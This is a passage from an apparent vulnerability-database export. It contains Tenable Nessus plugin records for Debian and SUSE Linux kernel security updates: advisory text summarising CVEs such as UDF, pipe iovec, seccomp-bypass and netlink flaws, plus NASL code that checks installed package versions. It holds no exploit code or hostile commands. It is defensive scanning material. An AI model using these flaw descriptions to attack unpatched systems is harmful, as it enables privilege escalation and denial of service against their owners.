corrects the defective patches applied in that update causing\nthese problems. For reference the original advisory text follows.\n\nThis update fixes the CVEs described below.\n\nCVE-2011-5321\n\nJiri Slaby discovered that tty_driver_lookup_tty() may leak a\nreference to the tty driver. A local user could use this flaw to crash\nthe system.\n\nCVE-2012-6689\n\nPablo Neira Ayuso discovered that non-root user-space processes can\nsend forged Netlink notifications to other processes. A local user\ncould use this flaw for denial of service or privilege escalation.\n\nCVE-2014-3184\n\nBen Hawkes discovered that various HID drivers may over-read the\nreport descriptor buffer, possibly resulting in a crash if a HID with\na crafted descriptor is plugged in.\n\nCVE-2014-8159\n\nIt was found that the Linux kernel's InfiniBand/RDMA subsystem did not\nproperly sanitize input parameters while registering memory regions\nfrom user space via the (u)verbs API. A local user with access to a\n/dev/infiniband/uverbsX device could use this flaw to crash the system\nor, potentially, escalate their privileges on the system.\n\nCVE-2014-9683\n\nDmitry Chernenkov discovered that eCryptfs writes past the end of the\nallocated buffer during encrypted filename decoding, resulting in\nlocal denial of service.\n\nCVE-2014-9728 / CVE-2014-9729 / CVE-2014-9730 / CVE-2014-9731 /\nCVE-2015-4167\n\nCarl Henrik Lunde discovered that the UDF implementation is missing\nseveral necessary length checks. A local user that can mount devices\ncould use these various flaws to crash the system, to leak information\nfrom the kernel, or possibly for privilege escalation.\n\nCVE-2015-1805\n\nRed Hat discovered that the pipe iovec read and write implementations\nmay iterate over the iovec twice but will modify the iovec such that\nthe second iteration accesses the wrong memory. A local user could use\nthis flaw to crash the system or possibly for privilege escalation.\nThis may also result in data corruption and information leaks in pipes\nbetween non-malicious processes.\n\nCVE-2015-2041\n\nSasha Levin discovered that the LLC subsystem exposed some variables\nas sysctls with the wrong type. On a 64-bit kernel, this possibly\nallows privilege escalation from a process with CAP_NET_ADMIN\ncapability; it also results in a trivial information leak.\n\nCVE-2015-2042\n\nSasha Levin discovered that the RDS subsystem exposed some variables\nas sysctls with the wrong type. On a 64-bit kernel, this results in a\ntrivial information leak.\n\nCVE-2015-2830\n\nAndrew Lutomirski discovered that when a 64-bit task on an amd64\nkernel makes a fork(2) or clone(2) system call using int $0x80, the\n32-bit compatibility flag is set (correctly) but is not cleared on\nreturn. As a result, both seccomp and audit will misinterpret the\nfollowing system call by the task(s), possibly leading to a violation\nof security policy.\n\nCVE-2015-2922\n\nModio AB discovered that the IPv6 subsystem would process a router\nadvertisement that specifies no route but only a hop limit, which\nwould then be applied to the interface that received it. This can\nresult in loss of IPv6 connectivity beyond the local network.\n\nThis may be mitigated by disabling processing of IPv6 router\nadvertisements if they are not needed: sysctl\nnet.ipv6.conf.default.accept_ra=0 sysctl\nnet.ipv6.conf.<interface>.accept_ra=0\n\nCVE-2015-3339\n\nIt was found that the execve(2) system call can race with inode\nattribute changes made by chown(2). Although chown(2) clears the\nsetuid/setgid bits of a file if it changes the respective owner ID,\nthis race condition could result in execve(2) setting effective\nuid/gid to the new owner ID, a privilege escalation.\n\nFor the oldoldstable distribution (squeeze), these problems have been\nfixed in version 2.6.32-48squeeze12.\n\nFor the oldstable distribution (wheezy), these problems were fixed in\nlinux version 3.2.68-1+deb7u1 or earlier, except for CVE-2015-1805 and\nCVE-2015-4167 which will be fixed soon.\n\nFor the stable distribution (jessie), these problems were fixed in\nlinux version 3.16.7-ckt11-1 or earlier, except for CVE-2015-4167\nwhich will be fixed later.\n\nWe recommend that you upgrade your linux-2.6 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/06/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/linux-2.6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:firmware-linux-free\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-doc-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-486\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-openvz\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-vserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-486\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-manual-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-patch-debian-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-source-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-support-2.6.32-5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-tools-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"firmware-linux-free\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-base\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-doc-2.6.32\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-486\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-686-bigmem\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all-i386\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common-openvz\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common-vserver\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common-xen\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-openvz-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-openvz-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-686-bigmem\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-486\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686-bigmem\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686-bigmem-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-amd64-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-686-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-amd64-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686-bigmem\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686-bigmem-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-amd64-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-686-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-amd64-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-libc-dev\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-manual-2.6.32\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-patch-debian-2.6.32\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-source-2.6.32\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-support-2.6.32-5\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-tools-2.6.32\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-linux-system-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-linux-system-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:23:01", "description": "The SUSE Linux Enterprise 11 SP3 kernel was updated to receive various\nsecurity and bugfixes.\n\nFollowing security bugs were fixed :\n\n - CVE-2015-5707: An integer overflow in the SCSI generic\n driver could be potentially used by local attackers to\n crash the kernel or execute code (bsc#940338).\n\n - CVE-2015-5364: A remote denial of service (hang) via UDP\n flood with incorrect package checksums was fixed.\n (bsc#936831).\n\n - CVE-2015-5366: A remote denial of service (unexpected\n error returns) via UDP flood with incorrect package\n checksums was fixed. (bsc#936831).\n\n - CVE-2015-1420: A race condition in the handle_to_path\n function in fs/fhandle.c in the Linux kernel allowed\n local users to bypass intended size restrictions and\n trigger read operations on additional memory locations\n by changing the handle_bytes value of a file handle\n during the execution of this function (bnc#915517).\n\n - CVE-2015-4700: A local user could have created a bad\n instruction in the JIT processed BPF code, leading to a\n kernel crash (bnc#935705).\n\n - CVE-2015-4167: The UDF filesystem in the Linux kernel\n was vulnerable to a crash which could occur while\n fetching inode information from a corrupted/malicious\n udf file system image. (bsc#933907).\n\n - CVE-2014-9728 CVE-2014-9729 CVE-2014-9730 CVE-2014-9731:\n Various issues in handling UDF filesystems in the Linux\n kernel allowed the corruption of kernel memory and other\n issues. An attacker able to mount a corrupted/malicious\n UDF file system image could cause the kernel to crash.\n (bsc#933904 bsc#933896)\n\n - CVE-2015-2150: The Linux kernel did not properly\n restrict access to PCI command registers, which might\n have allowed local guest users to cause a denial of\n service (non-maskable interrupt and host crash) by\n disabling the (1) memory or (2) I/O decoding for a PCI\n Express device and then accessing the device, which\n triggers an Unsupported Request (UR) response\n (bsc#919463).\n\n - CVE-2015-0777: drivers/xen/usbback/usbback.c as used in\n the Linux kernel 2.6.x and 3.x in SUSE Linux\n distributions, allowed guest OS users to obtain\n sensitive information from uninitialized locations in\n host OS kernel memory via unspecified vectors\n (bnc#917830).\n\n - CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux\n kernel did not prevent the TS_COMPAT flag from reaching\n a user-mode task, which might have allowed local users\n to bypass the seccomp or audit protection mechanism via\n a crafted application that uses the (1) fork or (2)\n close system call, as demonstrated by an attack against\n seccomp before 3.16 (bnc#926240).\n\n - CVE-2015-1805: The Linux kernels implementation of\n vectored pipe read and write functionality did not take\n into account the I/O vectors that were already processed\n when retrying after a failed atomic access operation,\n potentially resulting in memory corruption due to an I/O\n vector array overrun. A local, unprivileged user could\n use this flaw to crash the system or, potentially,\n escalate their privileges on the system. (bsc#933429).\n\nAlso \n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "published": "2015-09-24T00:00:00", "title": "SUSE SLED11 / SLES11 Security Update : kernel (SUSE-SU-2015:1611-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2830", "CVE-2015-1420", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2015-0777", "CVE-2014-9729", "CVE-2015-2150", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-5707", "CVE-2015-4700", "CVE-2015-1805"], "modified": "2015-09-24T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-xen-extra", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-bigsmp-base", "p-cpe:/a:novell:suse_linux:kernel-bigsmp", "p-cpe:/a:novell:suse_linux:kernel-bigsmp-extra", "p-cpe:/a:novell:suse_linux:kernel-pae", "p-cpe:/a:novell:suse_linux:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-trace-base", "p-cpe:/a:novell:suse_linux:kernel-source", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-trace", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-pae-extra", "p-cpe:/a:novell:suse_linux:kernel-bigsmp-devel", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-pae-base", "p-cpe:/a:novell:suse_linux:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-ec2", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:kernel-ec2-devel"], "id": "SUSE_SU-2015-1611-1.NASL", "href": "https://www.tenable.com/plugins/nessus/86121", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1611-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86121);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-9728\", \"CVE-2014-9729\", \"CVE-2014-9730\", \"CVE-2014-9731\", \"CVE-2015-0777\", \"CVE-2015-1420\", \"CVE-2015-1805\", \"CVE-2015-2150\", \"CVE-2015-2830\", \"CVE-2015-4167\", \"CVE-2015-4700\", \"CVE-2015-5364\", \"CVE-2015-5366\", \"CVE-2015-5707\");\n script_bugtraq_id(72357, 73014, 73699, 73921, 74951, 74963, 74964, 75001, 75356, 75510);\n\n script_name(english:\"SUSE SLED11 / SLES11 Security Update : kernel (SUSE-SU-2015:1611-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 SP3 kernel was updated to receive various\nsecurity and bugfixes.\n\nFollowing security bugs were fixed :\n\n - CVE-2015-5707: An integer overflow in the SCSI generic\n driver could be potentially used by local attackers to\n crash the kernel or execute code (bsc#940338).\n\n - CVE-2015-5364: A remote denial of service (hang) via UDP\n flood with incorrect package checksums was fixed.\n (bsc#936831).\n\n - CVE-2015-5366: A remote denial of service (unexpected\n error returns) via UDP flood with incorrect package\n checksums was fixed. (bsc#936831).\n\n - CVE-2015-1420: A race condition in the handle_to_path\n function in fs/fhandle.c in the Linux kernel allowed\n local users to bypass intended size restrictions and\n trigger read operations on additional memory locations\n by changing the handle_bytes value of a file handle\n during the execution of this function (bnc#915517).\n\n - CVE-2015-4700: A local user could have created a bad\n instruction in the JIT processed BPF code, leading to a\n kernel crash (bnc#935705).\n\n - CVE-2015-4167: The UDF filesystem in the Linux kernel\n was vulnerable to a crash which could occur while\n fetching inode information from a corrupted/malicious\n udf file system image. (bsc#933907).\n\n - CVE-2014-9728 CVE-2014-9729 CVE-2014-9730 CVE-2014-9731:\n Various issues in handling UDF filesystems in the Linux\n kernel allowed the corruption of kernel memory and other\n issues. An attacker able to mount a corrupted/malicious\n UDF file system image could cause the kernel to crash.\n (bsc#933904 bsc#933896)\n\n - CVE-2015-2150: The Linux kernel did not properly\n restrict access to PCI command registers, which might\n have allowed local guest users to cause a denial of\n service (non-maskable interrupt and host crash) by\n disabling the (1) memory or (2) I/O decoding for a PCI\n Express device and then accessing the device, which\n triggers an Unsupported Request (UR) response\n (bsc#919463).\n\n - CVE-2015-0777: drivers/xen/usbback/usbback.c as used in\n the Linux kernel 2.6.x and 3.x in SUSE Linux\n distributions, allowed guest OS users to obtain\n sensitive information from uninitialized locations in\n host OS kernel memory via unspecified vectors\n (bnc#917830).\n\n - CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux\n kernel did not prevent the TS_COMPAT flag from reaching\n a user-mode task, which might have allowed local users\n to bypass the seccomp or audit protection mechanism via\n a crafted application that uses the (1) fork or (2)\n close system call, as demonstrated by an attack against\n seccomp before 3.16 (bnc#926240).\n\n - CVE-2015-1805: The Linux kernels implementation of\n vectored pipe read and write functionality did not take\n into account the I/O vectors that were already processed\n when retrying after a failed atomic access operation,\n potentially resulting in memory corruption due to an I/O\n vector array overrun. A local, unprivileged user could\n use this flaw to crash the system or, potentially,\n escalate their privileges on the system. (bsc#933429).\n\nAlso \n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=851068\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=867362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=873385\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=883380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=886785\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=894936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=915517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=917830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=919463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=920110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=920250\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=920733\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=921430\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=923245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=924701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925881\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=927355\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 